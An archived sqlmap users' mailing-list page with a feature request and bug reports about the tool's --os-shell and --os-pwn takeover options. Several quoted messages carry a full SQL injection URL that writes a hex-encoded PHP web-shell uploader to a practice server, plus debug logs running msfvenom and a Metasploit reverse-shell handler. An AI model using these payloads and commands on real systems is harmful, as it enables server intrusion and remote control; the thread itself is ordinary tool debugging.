sqlmap-users — sqlmap users mailing list

[sqlmap-users] Testenv inside docker

[Andres R. <and...@gm...>]

List,

    Anyone created a docker image for the sqlmap testenv [0]? I'm in
the process of migrating all the test apps we use for w3af build
process to docker and was wondering if maybe someone already did this.

[0] https://github.com/sqlmapproject/testenv
[1] https://github.com/andresriancho/w3af/issues/11353

Regards,
-- 
Andrés Riancho
Project Leader at w3af - http://w3af.org/
Web Application Attack and Audit Framework
Twitter: @w3af
GPG: 0x93C344F3

Re: [sqlmap-users] Sqlmap SigSegv on beep

[Miroslav S. <mir...@gm...>]

Can you please go to the "sqlmap/extra/beep" and from there run the:

python -vv beep.py > /tmp/run.txt 2>&1

...and send me back the content of file /tmp/run.txt ?

Bye

On Sun, Jul 19, 2015 at 4:42 PM, Vojtěch Polášek <kr...@gm...> wrote:

> Hi,
> I am running latest Sqlmap from Git and I am receiving SigSegv while
> using --beep parameter.
> I don't know what other information I should provide. Without --beep,
> everything is working as expected.
> Please feel free to ask me for more info.
> Thanks,
> Vojta
>
>
> ------------------------------------------------------------------------------
> Don't Limit Your Business. Reach for the Cloud.
> GigeNET's Cloud Solutions provide you with the tools and support that
> you need to offload your IT needs and focus on growing your business.
> Configured For All Businesses. Start Your Cloud Today.
> https://www.gigenetcloud.com/
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>



-- 
Miroslav Stampar
http://about.me/stamparm

[sqlmap-users] Sqlmap SigSegv on beep

[Vojtěch P. <kr...@gm...>]

Hi,
I am running latest Sqlmap from Git and I am receiving SigSegv while
using --beep parameter.
I don't know what other information I should provide. Without --beep,
everything is working as expected.
Please feel free to ask me for more info.
Thanks,
Vojta

Re: [sqlmap-users] sound indication of prompt during testing

[Miroslav S. <mir...@gm...>]

Hi.

Now, with the latest commit:

--beep              Beep on question and/or when SQL injection is found

Bye

On Mon, Jul 13, 2015 at 5:27 PM, Vojtěch Polášek <kr...@gm...> wrote:

> Greetings,
> I am doing very thorough tests which take usually several hours per one
> URL.
> Sometimes, Sqlmap asks me some question during the test. I am blind so
> unfortunatelly, sometimes I don't notice this early enough and I lose
> time and sometimes my session expires etc.
> I know there is a --beep option which makes a beep when SQL injection is
> found. But this is not enough for me, because most of questions aren't
> actual SQL injections.
> Could you please add some option to make beep whenever some prompt appears?
> Thanks,
> Vojta
>
>
> ------------------------------------------------------------------------------
> Don't Limit Your Business. Reach for the Cloud.
> GigeNET's Cloud Solutions provide you with the tools and support that
> you need to offload your IT needs and focus on growing your business.
> Configured For All Businesses. Start Your Cloud Today.
> https://www.gigenetcloud.com/
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>



-- 
Miroslav Stampar
http://about.me/stamparm

[sqlmap-users] sound indication of prompt during testing

[Vojtěch P. <kr...@gm...>]

Greetings,
I am doing very thorough tests which take usually several hours per one URL.
Sometimes, Sqlmap asks me some question during the test. I am blind so
unfortunatelly, sometimes I don't notice this early enough and I lose
time and sometimes my session expires etc.
I know there is a --beep option which makes a beep when SQL injection is
found. But this is not enough for me, because most of questions aren't
actual SQL injections.
Could you please add some option to make beep whenever some prompt appears?
Thanks,
Vojta

Re: [sqlmap-users] SQLmap --os-pwn Meterpreter BUG

[Miroslav S. <mir...@gm...>]

Not able to reproduce. Can you please send the complete output of -v 3
(even the "executing local command" parts). It seems that you are either
getting the binary shellcodeexec payload (I am getting the alphanum in both
msfvenom and non-msfvenom environment) or the remote path contains
non-ASCII chars.

Bye

On Sun, Jul 5, 2015 at 7:41 AM, Danux <da...@gm...> wrote:

> Got another error when trying to use the metasploit reverse shell option
> either default shell or Meterpreter, below the run:
>
> which payload do you want to use?
> [1] Shell (default)
> [2] Meterpreter (beta)
> > 1
> [22:36:39] [DEBUG] executing local command:
> /usr/share/metasploit-framework/msfvenom -p linux/x86/shell/reverse_tcp
> EXITFUNC=process LPORT=3000 LHOST=192.168.184.217 -a x86 -e x86/alpha_mixed
> -f raw > "/root/.sqlmap/output/cstt/tmpmgspp" BufferRegister=EAX
> [22:36:39] [INFO] creation in progress ..... done
> [22:36:44] [DEBUG] the shellcode size is 102 bytes
> what is the back-end database management system architecture?
> [1] 32-bit (default)
> [2] 64-bit
> > 1
> [22:36:47] [INFO] uploading shellcodeexec to '/tmp/tmpsegspp'
> [22:36:47] [INFO] shellcodeexec successfully uploaded
> [22:36:47] [INFO] running Metasploit Framework command line interface
> locally, please wait..
> [22:36:47] [DEBUG] executing local command:
> /usr/share/metasploit-framework/msfcli multi/handler
> PAYLOAD=linux/x86/shell/reverse_tcp EXITFUNC=process LPORT=3000
> LHOST=192.168.184.217 E
> [*] Initializing modules...
> PAYLOAD => linux/x86/shell/reverse_tcp
> EXITFUNC => process
> LPORT => 3000
> LHOST => 192.168.184.217
> [*] Started reverse handler on 192.168.184.217:3000
> [*] Starting the payload handler...
> [22:36:51] [INFO] running Metasploit Framework shellcode remotely via
> shellcodeexec, please wait..
> [22:36:51] [WARNING] HTTP error codes detected during run:
> 404 (Not Found) - 6 times
> [22:36:51] [DEBUG] too many 4xx and/or 5xx HTTP error codes could mean
> that some kind of protection is involved (e.g. WAF)
>
> [22:36:52] [CRITICAL] unhandled exception occurred in
> sqlmap/1.0-dev-96327b6. It is recommended to retry your run with the latest
> development version from official GitHub repository at '
> https://github.com/sqlmapproject/sqlmap'. If the exception persists,
> please open a new issue at '
> https://github.com/sqlmapproject/sqlmap/issues/new' with the following
> text and any other information required to reproduce the bug. The
> developers will try to reproduce the bug, fix it accordingly and get back
> to you
> sqlmap version: 1.0-dev-96327b6
> Python version: 2.7.3
> Operating system: posix
> Command line: ./sqlmap -u
> *********************************************************************
> --os-pwn --msf-path /usr/share/metasploit-framework/ -v3
> Technique: UNION
> Back-end DBMS: MySQL (fingerprinted)
> Traceback (most recent call last):
>   File "sqlmap", line 102, in main
>     start()
>   File "lib/controller/controller.py", line 617, in start
>     action()
>   File "lib/controller/action.py", line 163, in action
>     conf.dbmsHandler.osPwn()
>   File "plugins/generic/takeover.py", line 261, in osPwn
>     self.pwn(goUdf)
>   File "lib/takeover/metasploit.py", line 651, in pwn
>     debugMsg += "with return code %s" %
> self._controlMsfCmd(self._msfCliProc, func)
>   File "lib/takeover/metasploit.py", line 533, in _controlMsfCmd
>     func()
>   File "lib/takeover/metasploit.py", line 434, in
> _runMsfShellcodeRemoteViaSexec
>     cmd = "%s %s &" % (self.shellcodeexecRemote, self.shellcodeString)
> UnicodeDecodeError: 'ascii' codec can't decode byte 0x89 in position 0:
> ordinal not in range(128)
>
>
> --
> DanUx
>



-- 
Miroslav Stampar
http://about.me/stamparm

[sqlmap-users] SQLmap --os-pwn Meterpreter BUG

[Danux <da...@gm...>]

Got another error when trying to use the metasploit reverse shell option
either default shell or Meterpreter, below the run:

which payload do you want to use?
[1] Shell (default)
[2] Meterpreter (beta)
> 1
[22:36:39] [DEBUG] executing local command:
/usr/share/metasploit-framework/msfvenom -p linux/x86/shell/reverse_tcp
EXITFUNC=process LPORT=3000 LHOST=192.168.184.217 -a x86 -e x86/alpha_mixed
-f raw > "/root/.sqlmap/output/cstt/tmpmgspp" BufferRegister=EAX
[22:36:39] [INFO] creation in progress ..... done
[22:36:44] [DEBUG] the shellcode size is 102 bytes
what is the back-end database management system architecture?
[1] 32-bit (default)
[2] 64-bit
> 1
[22:36:47] [INFO] uploading shellcodeexec to '/tmp/tmpsegspp'
[22:36:47] [INFO] shellcodeexec successfully uploaded
[22:36:47] [INFO] running Metasploit Framework command line interface
locally, please wait..
[22:36:47] [DEBUG] executing local command:
/usr/share/metasploit-framework/msfcli multi/handler
PAYLOAD=linux/x86/shell/reverse_tcp EXITFUNC=process LPORT=3000
LHOST=192.168.184.217 E
[*] Initializing modules...
PAYLOAD => linux/x86/shell/reverse_tcp
EXITFUNC => process
LPORT => 3000
LHOST => 192.168.184.217
[*] Started reverse handler on 192.168.184.217:3000
[*] Starting the payload handler...
[22:36:51] [INFO] running Metasploit Framework shellcode remotely via
shellcodeexec, please wait..
[22:36:51] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 6 times
[22:36:51] [DEBUG] too many 4xx and/or 5xx HTTP error codes could mean that
some kind of protection is involved (e.g. WAF)

[22:36:52] [CRITICAL] unhandled exception occurred in
sqlmap/1.0-dev-96327b6. It is recommended to retry your run with the latest
development version from official GitHub repository at '
https://github.com/sqlmapproject/sqlmap'. If the exception persists, please
open a new issue at 'https://github.com/sqlmapproject/sqlmap/issues/new'
with the following text and any other information required to reproduce the
bug. The developers will try to reproduce the bug, fix it accordingly and
get back to you
sqlmap version: 1.0-dev-96327b6
Python version: 2.7.3
Operating system: posix
Command line: ./sqlmap -u
*********************************************************************
--os-pwn --msf-path /usr/share/metasploit-framework/ -v3
Technique: UNION
Back-end DBMS: MySQL (fingerprinted)
Traceback (most recent call last):
  File "sqlmap", line 102, in main
    start()
  File "lib/controller/controller.py", line 617, in start
    action()
  File "lib/controller/action.py", line 163, in action
    conf.dbmsHandler.osPwn()
  File "plugins/generic/takeover.py", line 261, in osPwn
    self.pwn(goUdf)
  File "lib/takeover/metasploit.py", line 651, in pwn
    debugMsg += "with return code %s" %
self._controlMsfCmd(self._msfCliProc, func)
  File "lib/takeover/metasploit.py", line 533, in _controlMsfCmd
    func()
  File "lib/takeover/metasploit.py", line 434, in
_runMsfShellcodeRemoteViaSexec
    cmd = "%s %s &" % (self.shellcodeexecRemote, self.shellcodeString)
UnicodeDecodeError: 'ascii' codec can't decode byte 0x89 in position 0:
ordinal not in range(128)


-- 
DanUx

Re: [sqlmap-users] SQLmap --os-shell BUG

[Danux <da...@gm...>]

That was fast! Thanks Miroslav. Great tool!

On Sat, Jul 4, 2015 at 4:47 PM, Miroslav Stampar <mir...@gm...
> wrote:

> Thank you for your report. Fixed with the latest revision (
> https://github.com/sqlmapproject/sqlmap/issues/1290)
>
> Bye
>
> On Sun, Jul 5, 2015 at 1:16 AM, Danux <da...@gm...> wrote:
>
>> With yours is not throwing the error, you can reproduce my case with the
>> owasppractice examples, I am attaching the source code here, you will need
>> to setup the DB. Once up and running try lesson03:
>>
>> sqlmap.py -u
>> http://OwaspPractice/injection/lessons/lesson03/index.php?code=N
>> --os-shel l--prefix "\")"   -v3
>>
>> it looks like the back-end DBMS is 'MySQL'. Do you want to skip test
>> payloads specific for other DBMSes? [Y/n]
>> Y
>> for the remaining tests, do you want to include all tests for 'MySQL'
>> extending provided level (1) and risk (1) values? [Y/n]
>> n
>>
>> And should get the same error handling issue.
>>
>>
>>
>> On Sat, Jul 4, 2015 at 4:01 PM, Miroslav Stampar <
>> mir...@gm...> wrote:
>>
>>> Something is really wrong happening here. One user is having the
>>> identical problem like you (AttributeError: 'NoneType' object has no
>>> attribute 'replace') and I am not able to reproduce.
>>>
>>> Can you please rerun your sqlmap version with "
>>> http://testphp.vulnweb.com/artists.php?artist=1" and tell me if you get
>>> the same error?
>>>
>>> Bye
>>>
>>> On Sun, Jul 5, 2015 at 12:57 AM, Danux <da...@gm...> wrote:
>>>
>>>> Just clone git and got 1.0-dev-166dc98 version but got a unhandled
>>>> exception error:
>>>>
>>>> ./sqlmap.py -u
>>>> http://OwaspPractice/injection/lessons/lesson03/index.php?code=N
>>>> --os-shell --prefix "\")"  --flush-session -v3
>>>>
>>>> /sqlmap'. If the exception persists, please open a new issue at '
>>>> https://github.com/sqlmapproject/sqlmap/issues/new' with the following
>>>> text and any other information required to reproduce the bug. The
>>>> developers will try to reproduce the bug, fix it accordingly and get back
>>>> to you
>>>> sqlmap version: 1.0-dev-166dc98
>>>> Python version: 2.7.3
>>>> Operating system: posix
>>>> Command line: sqlmap.py -u
>>>> *********************************************************************
>>>> --os-shell --prefix ") --flush-session -v3
>>>> Technique: None
>>>> Back-end DBMS: MySQL (fingerprinted)
>>>> Traceback (most recent call last):
>>>>   File "sqlmap.py", line 102, in main
>>>>     start()
>>>>   File "lib/controller/controller.py", line 514, in start
>>>>     injection = checkSqlInjection(place, parameter, value)
>>>>   File "lib/controller/checks.py", line 391, in checkSqlInjection
>>>>     reqPayload = agent.payload(place, parameter, newValue=boundPayload,
>>>> where=where)
>>>>   File "lib/core/agent.py", line 188, in payload
>>>>     retVal = _(regex, "%s=%s" % (parameter,
>>>> self.addPayloadDelimiters(newValue.replace("\\", "\\\\"))), paramString)
>>>> AttributeError: 'NoneType' object has no attribute 'replace'
>>>>
>>>>
>>>> On Sat, Jul 4, 2015 at 3:43 PM, Miroslav Stampar <
>>>> mir...@gm...> wrote:
>>>>
>>>>> I believe that you are using an old revision. For a long time there is
>>>>> at least a git revision or a pseudo "non-git" number appearing when "sqlmap
>>>>> --version" is being used.
>>>>>
>>>>> Please update to the latest revision from the official github
>>>>> repository and rerun the sqlmap.
>>>>>
>>>>> Bye
>>>>>
>>>>> On Sun, Jul 5, 2015 at 12:41 AM, Danux <da...@gm...> wrote:
>>>>>
>>>>>> Thanks
>>>>>>
>>>>>> sqlmap --version
>>>>>> sqlmap/1.0-dev
>>>>>>
>>>>>> In the meantime I will patch procs/mysql/write_file_limit.sql
>>>>>>
>>>>>>
>>>>>>
>>>>>>
>>>>>> On Sat, Jul 4, 2015 at 3:40 PM, Miroslav Stampar <
>>>>>> mir...@gm...> wrote:
>>>>>>
>>>>>>> Which revision/version of sqlmap do you use? There has been a
>>>>>>> related patch a month ago. Will check tomorrow.
>>>>>>>
>>>>>>> Bye
>>>>>>>
>>>>>>> On Sun, Jul 5, 2015 at 12:33 AM, Danux <da...@gm...> wrote:
>>>>>>>
>>>>>>>> Hello list, there is an issue with sqlmap when using the --os-shell
>>>>>>>> option in version sqlmap/1.0-dev and MySQL: 5.5.35-0+wheezy1 (Debian)
>>>>>>>>
>>>>>>>> Description:
>>>>>>>>
>>>>>>>> A specific PAYLOAD (see below) used to upload a web shell will
>>>>>>>> create an empty file e.g. tmpbezff.php, this will cause that every
>>>>>>>> subsequent PAYLOAD attempt will fail with an "already exist" error and
>>>>>>>> therefore not able to upload the web shell.
>>>>>>>>
>>>>>>>>
>>>>>>>> http://OwaspPractice/injection/lessons/lesson03/index.php?code=NTGRWNR%22%29%20LIMIT%200,1%20INTO%20OUTFILE%20%27/var/www/OwaspPractice/upload/tmpupjed.php%27%20LINES%20TERMINATED%20BY%200x3c3f7068700a69662028697373657428245f524551554553545b2275706c6f6164225d29297b246469723d245f524551554553545b2275706c6f6164446972225d3b6966202870687076657273696f6e28293c27342e312e3027297b2466696c653d24485454505f504f53545f46494c45535b2266696c65225d5b226e616d65225d3b406d6f76655f75706c6f616465645f66696c652824485454505f504f53545f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c246469722e222f222e2466696c6529206f722064696528293b7d656c73657b2466696c653d245f46494c45535b2266696c65225d5b226e616d65225d3b406d6f76655f75706c6f616465645f66696c6528245f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c246469722e222f222e2466696c6529206f722064696528293b7d4063686d6f6428246469722e222f222e2466696c652c30373535293b6563686f202246696c652075706c6f61646564223b7d656c7365207b6563686f20223c666f726d20616374696f6e3d222e245f5345525645525b225048505f53454c46225d2e22206d6574686f643d504f535420656e63747970653d6d756c7469706172742f666f726d2d646174613e3c696e70757420747970653d68696464656e206e616d653d4d41585f46494c455f53495a452076616c75653d313030303030303030303e3c623e73716c6d61702066696c652075706c6f616465723c2f623e3c62723e3c696e707574206e616d653d66696c6520747970653d66696c653e3c62723e746f206469726563746f72793a203c696e70757420747970653d74657874206e616d653d75706c6f61644469722076616c75653d2f7661722f7777772f4f7761737050726163746963652f75706c6f61643e203c696e70757420747970653d7375626d6974206e616d653d75706c6f61642076616c75653d75706c6f61643e3c2f666f726d3e223b7d3f3e0a--+
>>>>>>>>
>>>>>>>> By default, MySQL will throw an error if the file already exists:
>>>>>>>>
>>>>>>>> mysql> select 'ss' into outfile
>>>>>>>> '/var/www/OwaspPractice/upload/tmpbezff.php';
>>>>>>>> ERROR 1086 (HY000): File
>>>>>>>> '/var/www/OwaspPractice/upload/tmpbezff.php' already exists
>>>>>>>>
>>>>>>>> Solution:
>>>>>>>>
>>>>>>>> 1. Change the web shell name for every new PAYLOAD attempt, at
>>>>>>>> least when using the -os-shell option
>>>>>>>> 2. Fix the PAYLOAD causing problems.
>>>>>>>>
>>>>>>>> --
>>>>>>>> DanUx
>>>>>>>>
>>>>>>>>
>>>>>>>> ------------------------------------------------------------------------------
>>>>>>>> Don't Limit Your Business. Reach for the Cloud.
>>>>>>>> GigeNET's Cloud Solutions provide you with the tools and support
>>>>>>>> that
>>>>>>>> you need to offload your IT needs and focus on growing your
>>>>>>>> business.
>>>>>>>> Configured For All Businesses. Start Your Cloud Today.
>>>>>>>> https://www.gigenetcloud.com/
>>>>>>>> _______________________________________________
>>>>>>>> sqlmap-users mailing list
>>>>>>>> sql...@li...
>>>>>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>>>>>>
>>>>>>>>
>>>>>>>
>>>>>>>
>>>>>>> --
>>>>>>> Miroslav Stampar
>>>>>>> http://about.me/stamparm
>>>>>>>
>>>>>>
>>>>>>
>>>>>>
>>>>>> --
>>>>>> DanUx
>>>>>>
>>>>>
>>>>>
>>>>>
>>>>> --
>>>>> Miroslav Stampar
>>>>> http://about.me/stamparm
>>>>>
>>>>
>>>>
>>>>
>>>> --
>>>> DanUx
>>>>
>>>
>>>
>>>
>>> --
>>> Miroslav Stampar
>>> http://about.me/stamparm
>>>
>>
>>
>>
>> --
>> DanUx
>>
>
>
>
> --
> Miroslav Stampar
> http://about.me/stamparm
>



-- 
DanUx

Re: [sqlmap-users] SQLmap --os-shell BUG

[Miroslav S. <mir...@gm...>]

Thank you for your report. Fixed with the latest revision (
https://github.com/sqlmapproject/sqlmap/issues/1290)

Bye

On Sun, Jul 5, 2015 at 1:16 AM, Danux <da...@gm...> wrote:

> With yours is not throwing the error, you can reproduce my case with the
> owasppractice examples, I am attaching the source code here, you will need
> to setup the DB. Once up and running try lesson03:
>
> sqlmap.py -u
> http://OwaspPractice/injection/lessons/lesson03/index.php?code=N
> --os-shel l--prefix "\")"   -v3
>
> it looks like the back-end DBMS is 'MySQL'. Do you want to skip test
> payloads specific for other DBMSes? [Y/n]
> Y
> for the remaining tests, do you want to include all tests for 'MySQL'
> extending provided level (1) and risk (1) values? [Y/n]
> n
>
> And should get the same error handling issue.
>
>
>
> On Sat, Jul 4, 2015 at 4:01 PM, Miroslav Stampar <
> mir...@gm...> wrote:
>
>> Something is really wrong happening here. One user is having the
>> identical problem like you (AttributeError: 'NoneType' object has no
>> attribute 'replace') and I am not able to reproduce.
>>
>> Can you please rerun your sqlmap version with "
>> http://testphp.vulnweb.com/artists.php?artist=1" and tell me if you get
>> the same error?
>>
>> Bye
>>
>> On Sun, Jul 5, 2015 at 12:57 AM, Danux <da...@gm...> wrote:
>>
>>> Just clone git and got 1.0-dev-166dc98 version but got a unhandled
>>> exception error:
>>>
>>> ./sqlmap.py -u
>>> http://OwaspPractice/injection/lessons/lesson03/index.php?code=N
>>> --os-shell --prefix "\")"  --flush-session -v3
>>>
>>> /sqlmap'. If the exception persists, please open a new issue at '
>>> https://github.com/sqlmapproject/sqlmap/issues/new' with the following
>>> text and any other information required to reproduce the bug. The
>>> developers will try to reproduce the bug, fix it accordingly and get back
>>> to you
>>> sqlmap version: 1.0-dev-166dc98
>>> Python version: 2.7.3
>>> Operating system: posix
>>> Command line: sqlmap.py -u
>>> *********************************************************************
>>> --os-shell --prefix ") --flush-session -v3
>>> Technique: None
>>> Back-end DBMS: MySQL (fingerprinted)
>>> Traceback (most recent call last):
>>>   File "sqlmap.py", line 102, in main
>>>     start()
>>>   File "lib/controller/controller.py", line 514, in start
>>>     injection = checkSqlInjection(place, parameter, value)
>>>   File "lib/controller/checks.py", line 391, in checkSqlInjection
>>>     reqPayload = agent.payload(place, parameter, newValue=boundPayload,
>>> where=where)
>>>   File "lib/core/agent.py", line 188, in payload
>>>     retVal = _(regex, "%s=%s" % (parameter,
>>> self.addPayloadDelimiters(newValue.replace("\\", "\\\\"))), paramString)
>>> AttributeError: 'NoneType' object has no attribute 'replace'
>>>
>>>
>>> On Sat, Jul 4, 2015 at 3:43 PM, Miroslav Stampar <
>>> mir...@gm...> wrote:
>>>
>>>> I believe that you are using an old revision. For a long time there is
>>>> at least a git revision or a pseudo "non-git" number appearing when "sqlmap
>>>> --version" is being used.
>>>>
>>>> Please update to the latest revision from the official github
>>>> repository and rerun the sqlmap.
>>>>
>>>> Bye
>>>>
>>>> On Sun, Jul 5, 2015 at 12:41 AM, Danux <da...@gm...> wrote:
>>>>
>>>>> Thanks
>>>>>
>>>>> sqlmap --version
>>>>> sqlmap/1.0-dev
>>>>>
>>>>> In the meantime I will patch procs/mysql/write_file_limit.sql
>>>>>
>>>>>
>>>>>
>>>>>
>>>>> On Sat, Jul 4, 2015 at 3:40 PM, Miroslav Stampar <
>>>>> mir...@gm...> wrote:
>>>>>
>>>>>> Which revision/version of sqlmap do you use? There has been a related
>>>>>> patch a month ago. Will check tomorrow.
>>>>>>
>>>>>> Bye
>>>>>>
>>>>>> On Sun, Jul 5, 2015 at 12:33 AM, Danux <da...@gm...> wrote:
>>>>>>
>>>>>>> Hello list, there is an issue with sqlmap when using the --os-shell
>>>>>>> option in version sqlmap/1.0-dev and MySQL: 5.5.35-0+wheezy1 (Debian)
>>>>>>>
>>>>>>> Description:
>>>>>>>
>>>>>>> A specific PAYLOAD (see below) used to upload a web shell will
>>>>>>> create an empty file e.g. tmpbezff.php, this will cause that every
>>>>>>> subsequent PAYLOAD attempt will fail with an "already exist" error and
>>>>>>> therefore not able to upload the web shell.
>>>>>>>
>>>>>>>
>>>>>>> http://OwaspPractice/injection/lessons/lesson03/index.php?code=NTGRWNR%22%29%20LIMIT%200,1%20INTO%20OUTFILE%20%27/var/www/OwaspPractice/upload/tmpupjed.php%27%20LINES%20TERMINATED%20BY%200x3c3f7068700a69662028697373657428245f524551554553545b2275706c6f6164225d29297b246469723d245f524551554553545b2275706c6f6164446972225d3b6966202870687076657273696f6e28293c27342e312e3027297b2466696c653d24485454505f504f53545f46494c45535b2266696c65225d5b226e616d65225d3b406d6f76655f75706c6f616465645f66696c652824485454505f504f53545f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c246469722e222f222e2466696c6529206f722064696528293b7d656c73657b2466696c653d245f46494c45535b2266696c65225d5b226e616d65225d3b406d6f76655f75706c6f616465645f66696c6528245f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c246469722e222f222e2466696c6529206f722064696528293b7d4063686d6f6428246469722e222f222e2466696c652c30373535293b6563686f202246696c652075706c6f61646564223b7d656c7365207b6563686f20223c666f726d20616374696f6e3d222e245f5345525645525b225048505f53454c46225d2e22206d6574686f643d504f535420656e63747970653d6d756c7469706172742f666f726d2d646174613e3c696e70757420747970653d68696464656e206e616d653d4d41585f46494c455f53495a452076616c75653d313030303030303030303e3c623e73716c6d61702066696c652075706c6f616465723c2f623e3c62723e3c696e707574206e616d653d66696c6520747970653d66696c653e3c62723e746f206469726563746f72793a203c696e70757420747970653d74657874206e616d653d75706c6f61644469722076616c75653d2f7661722f7777772f4f7761737050726163746963652f75706c6f61643e203c696e70757420747970653d7375626d6974206e616d653d75706c6f61642076616c75653d75706c6f61643e3c2f666f726d3e223b7d3f3e0a--+
>>>>>>>
>>>>>>> By default, MySQL will throw an error if the file already exists:
>>>>>>>
>>>>>>> mysql> select 'ss' into outfile
>>>>>>> '/var/www/OwaspPractice/upload/tmpbezff.php';
>>>>>>> ERROR 1086 (HY000): File
>>>>>>> '/var/www/OwaspPractice/upload/tmpbezff.php' already exists
>>>>>>>
>>>>>>> Solution:
>>>>>>>
>>>>>>> 1. Change the web shell name for every new PAYLOAD attempt, at least
>>>>>>> when using the -os-shell option
>>>>>>> 2. Fix the PAYLOAD causing problems.
>>>>>>>
>>>>>>> --
>>>>>>> DanUx
>>>>>>>
>>>>>>>
>>>>>>> ------------------------------------------------------------------------------
>>>>>>> Don't Limit Your Business. Reach for the Cloud.
>>>>>>> GigeNET's Cloud Solutions provide you with the tools and support that
>>>>>>> you need to offload your IT needs and focus on growing your business.
>>>>>>> Configured For All Businesses. Start Your Cloud Today.
>>>>>>> https://www.gigenetcloud.com/
>>>>>>> _______________________________________________
>>>>>>> sqlmap-users mailing list
>>>>>>> sql...@li...
>>>>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>>>>>
>>>>>>>
>>>>>>
>>>>>>
>>>>>> --
>>>>>> Miroslav Stampar
>>>>>> http://about.me/stamparm
>>>>>>
>>>>>
>>>>>
>>>>>
>>>>> --
>>>>> DanUx
>>>>>
>>>>
>>>>
>>>>
>>>> --
>>>> Miroslav Stampar
>>>> http://about.me/stamparm
>>>>
>>>
>>>
>>>
>>> --
>>> DanUx
>>>
>>
>>
>>
>> --
>> Miroslav Stampar
>> http://about.me/stamparm
>>
>
>
>
> --
> DanUx
>



-- 
Miroslav Stampar
http://about.me/stamparm

Re: [sqlmap-users] SQLmap --os-shell BUG

[Miroslav S. <mir...@gm...>]

Something is really wrong happening here. One user is having the identical
problem like you (AttributeError: 'NoneType' object has no attribute
'replace') and I am not able to reproduce.

Can you please rerun your sqlmap version with "
http://testphp.vulnweb.com/artists.php?artist=1" and tell me if you get the
same error?

Bye

On Sun, Jul 5, 2015 at 12:57 AM, Danux <da...@gm...> wrote:

> Just clone git and got 1.0-dev-166dc98 version but got a unhandled
> exception error:
>
> ./sqlmap.py -u
> http://OwaspPractice/injection/lessons/lesson03/index.php?code=N
> --os-shell --prefix "\")"  --flush-session -v3
>
> /sqlmap'. If the exception persists, please open a new issue at '
> https://github.com/sqlmapproject/sqlmap/issues/new' with the following
> text and any other information required to reproduce the bug. The
> developers will try to reproduce the bug, fix it accordingly and get back
> to you
> sqlmap version: 1.0-dev-166dc98
> Python version: 2.7.3
> Operating system: posix
> Command line: sqlmap.py -u
> *********************************************************************
> --os-shell --prefix ") --flush-session -v3
> Technique: None
> Back-end DBMS: MySQL (fingerprinted)
> Traceback (most recent call last):
>   File "sqlmap.py", line 102, in main
>     start()
>   File "lib/controller/controller.py", line 514, in start
>     injection = checkSqlInjection(place, parameter, value)
>   File "lib/controller/checks.py", line 391, in checkSqlInjection
>     reqPayload = agent.payload(place, parameter, newValue=boundPayload,
> where=where)
>   File "lib/core/agent.py", line 188, in payload
>     retVal = _(regex, "%s=%s" % (parameter,
> self.addPayloadDelimiters(newValue.replace("\\", "\\\\"))), paramString)
> AttributeError: 'NoneType' object has no attribute 'replace'
>
>
> On Sat, Jul 4, 2015 at 3:43 PM, Miroslav Stampar <
> mir...@gm...> wrote:
>
>> I believe that you are using an old revision. For a long time there is at
>> least a git revision or a pseudo "non-git" number appearing when "sqlmap
>> --version" is being used.
>>
>> Please update to the latest revision from the official github repository
>> and rerun the sqlmap.
>>
>> Bye
>>
>> On Sun, Jul 5, 2015 at 12:41 AM, Danux <da...@gm...> wrote:
>>
>>> Thanks
>>>
>>> sqlmap --version
>>> sqlmap/1.0-dev
>>>
>>> In the meantime I will patch procs/mysql/write_file_limit.sql
>>>
>>>
>>>
>>>
>>> On Sat, Jul 4, 2015 at 3:40 PM, Miroslav Stampar <
>>> mir...@gm...> wrote:
>>>
>>>> Which revision/version of sqlmap do you use? There has been a related
>>>> patch a month ago. Will check tomorrow.
>>>>
>>>> Bye
>>>>
>>>> On Sun, Jul 5, 2015 at 12:33 AM, Danux <da...@gm...> wrote:
>>>>
>>>>> Hello list, there is an issue with sqlmap when using the --os-shell
>>>>> option in version sqlmap/1.0-dev and MySQL: 5.5.35-0+wheezy1 (Debian)
>>>>>
>>>>> Description:
>>>>>
>>>>> A specific PAYLOAD (see below) used to upload a web shell will create
>>>>> an empty file e.g. tmpbezff.php, this will cause that every subsequent
>>>>> PAYLOAD attempt will fail with an "already exist" error and therefore not
>>>>> able to upload the web shell.
>>>>>
>>>>>
>>>>> http://OwaspPractice/injection/lessons/lesson03/index.php?code=NTGRWNR%22%29%20LIMIT%200,1%20INTO%20OUTFILE%20%27/var/www/OwaspPractice/upload/tmpupjed.php%27%20LINES%20TERMINATED%20BY%200x3c3f7068700a69662028697373657428245f524551554553545b2275706c6f6164225d29297b246469723d245f524551554553545b2275706c6f6164446972225d3b6966202870687076657273696f6e28293c27342e312e3027297b2466696c653d24485454505f504f53545f46494c45535b2266696c65225d5b226e616d65225d3b406d6f76655f75706c6f616465645f66696c652824485454505f504f53545f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c246469722e222f222e2466696c6529206f722064696528293b7d656c73657b2466696c653d245f46494c45535b2266696c65225d5b226e616d65225d3b406d6f76655f75706c6f616465645f66696c6528245f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c246469722e222f222e2466696c6529206f722064696528293b7d4063686d6f6428246469722e222f222e2466696c652c30373535293b6563686f202246696c652075706c6f61646564223b7d656c7365207b6563686f20223c666f726d20616374696f6e3d222e245f5345525645525b225048505f53454c46225d2e22206d6574686f643d504f535420656e63747970653d6d756c7469706172742f666f726d2d646174613e3c696e70757420747970653d68696464656e206e616d653d4d41585f46494c455f53495a452076616c75653d313030303030303030303e3c623e73716c6d61702066696c652075706c6f616465723c2f623e3c62723e3c696e707574206e616d653d66696c6520747970653d66696c653e3c62723e746f206469726563746f72793a203c696e70757420747970653d74657874206e616d653d75706c6f61644469722076616c75653d2f7661722f7777772f4f7761737050726163746963652f75706c6f61643e203c696e70757420747970653d7375626d6974206e616d653d75706c6f61642076616c75653d75706c6f61643e3c2f666f726d3e223b7d3f3e0a--+
>>>>>
>>>>> By default, MySQL will throw an error if the file already exists:
>>>>>
